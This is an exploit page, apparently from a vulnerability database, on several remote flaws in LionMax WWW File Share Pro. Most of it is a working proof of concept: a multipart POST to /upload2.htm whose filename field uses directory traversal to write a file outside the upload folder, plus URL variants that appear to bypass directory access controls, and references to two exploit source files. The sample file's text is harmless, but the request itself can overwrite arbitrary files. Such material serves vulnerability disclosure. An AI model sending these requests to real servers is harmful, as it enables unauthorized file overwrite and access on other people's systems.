• info
• discussion
• exploit
• solution
• references

LionMax Software WWW File Share Pro Multiple Remote Vulnerabilities

The following proof of concept exploits were supplied:

POST /upload2.htm HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------00000000000000000000000000000
Content-Length: ignored_by_this_specific_server

-----------------------------00000000000000000000000000000
Content-Disposition: form-data; name="file"; filename="../../../badfile.txt"
Content-Type: text/plain

I'm a bad file in a bad location.
If you see me you are vulnerable because an attacker can upload a malicious file everywhere in your system overwriting any existent file.
Now go to download the latest patch for your webserver or disable the Upload function!
-----------------------------00000000000000000000000000000
Content-Disposition: form-data; name="Submit"

Upload
-----------------------------00000000000000000000000000000--


http://server/directory./
http://server/\directory/
http://server///directory/
"GET \directory/ HTTP/1.0"

• /data/vulnerabilities/exploits/webpostmem.c
• /data/vulnerabilities/exploits/poststrike.c